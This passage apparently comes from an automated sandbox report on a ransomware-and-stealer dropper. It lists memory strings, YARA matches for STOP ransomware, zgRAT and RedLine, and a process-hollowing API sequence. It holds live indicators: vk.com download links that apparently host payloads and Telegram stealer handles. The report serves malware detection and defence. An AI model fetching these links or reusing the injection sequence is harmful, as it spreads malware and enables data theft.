                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2610251801.0000000001C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2610251801.0000000001C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://system.data.sqlite.org/
                      Source: ogoGQsWFwF_EcodN5qF7hiVC.exe, 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmp, zfQlIB6J8n2u_zLV5LHnA1xW.exe, 0000000C.00000002.2337447194.0000000004510000.00000004.00001000.00020000.00000000.sdmp, zfQlIB6J8n2u_zLV5LHnA1xW.exe, 0000000C.00000002.2317913229.0000000002260000.00000040.00001000.00020000.00000000.sdmp, zfQlIB6J8n2u_zLV5LHnA1xW.exe, 0000000C.00000002.2320846713.0000000004210000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwin
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.0000000001720000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2435816663.0000000005F26000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2436231362.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2636036770.0000000007B98000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2636231021.0000000008181000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2433632121.0000000001C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189316455.00000000043C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/browser_reports?dest=default_reports
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc5294803_669807694?hash=Sn8Y90pAESSpLPWQN3oshZSPomEZcURQihWHxCR6EjD&dl=cVTIDd6TPX72
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189316455.00000000043C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc5294803_669811786?hash=8bhjD7NgoJ7mZZEUFcsdZsXzzoRwkNFDlJU5B89faFX&dl=nQsFZJcLQzXn
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189316455.00000000043C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsECNfe
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2189316455.00000000043C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com/doc863235369_679584264?hash=NJcfUznJWwO5q7ao3LSYtO0mep3odX1HGIPp6Nunvkc&dl=1NxpJJ3861
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com:80/
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com:80/v
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vk.com:80/z
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2610251801.0000000001C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2610251801.0000000001C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2426316296.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2430728096.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2424664556.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2421138410.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2402668421.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2422084353.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2425502937.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2418069166.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2413763621.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2412949829.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2431897503.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2408424299.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2411566185.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2410219288.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2421570227.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2415624620.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2415199397.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2407677153.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2430301196.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2427111656.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2417237959.0000000005E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2610251801.0000000001C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2426316296.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2430728096.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2424664556.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2421138410.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2402668421.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2422084353.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2425502937.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2418069166.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2413763621.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2412949829.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2431897503.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2408424299.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2411566185.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2410219288.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2421570227.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2415624620.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2415199397.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2407677153.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2430301196.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2427111656.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2417237959.0000000005E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2426316296.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2430728096.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2424664556.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2421138410.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2402668421.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2422084353.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2425502937.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2418069166.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2413763621.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2412949829.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2431897503.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2408424299.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2411566185.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2410219288.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2421570227.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2415624620.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2415199397.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2407677153.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2430301196.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2427111656.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2417237959.0000000005E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/irefoxBv
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.sqlite.org/lang_aggfunc.html
                      Source: A_22rjVO67ooiUk2ueyL6tMl.exe, 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.sqlite.org/lang_corefunc.html
                      Source: Yara matchFile source: 0000000C.00000002.2320846713.0000000004210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: zfQlIB6J8n2u_zLV5LHnA1xW.exe PID: 3920, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\TmpAF4.tmpJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\TmpB24.tmpJump to dropped file

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: Yara matchFile source: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.22115a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.22115a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2662012015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 7U1bGcxK3Lqi_XMHDNEdJrhB.exe PID: 3680, type: MEMORYSTR

                      System Summary

                      barindex
                      Source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.477ac0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.4510000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                      Source: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                      Source: 41.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.42e7719.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 7.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.22115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                      Source: 7.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.22115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                      Source: 7.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.22115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                      Source: 7.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.22115a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                      Source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                      Source: 27.2.7U1bGcxK3Lqi_XMHDNEdJrhB.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.4510000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.42e7719.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.2260000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.2260000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.450000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.477ac0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 00000007.00000002.2311748071.0000000002170000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                      Source: 0000001B.00000002.2662012015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                      Source: 0000001B.00000002.2662012015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                      Source: 0000000C.00000002.2337447194.0000000004510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: 0000000C.00000002.2317913229.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                      Source: Process Memory Space: 7U1bGcxK3Lqi_XMHDNEdJrhB.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                      Source: CHA0VZiz8y.exeStatic PE information: section name:
                      Source: CHA0VZiz8y.exeStatic PE information: section name:
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: section name:
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: section name:
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: section name:
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: section name:
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: niko[1].exe.0.drStatic PE information: section name:
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: EPA5EhRzK9ZnpAjdUqLJteUs.exe.0.drStatic PE information: section name:
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_02210110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,7_2_02210110
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeCode function: 12_2_04319B10 NtProtectVirtualMemory,NtProtectVirtualMemory,12_2_04319B10
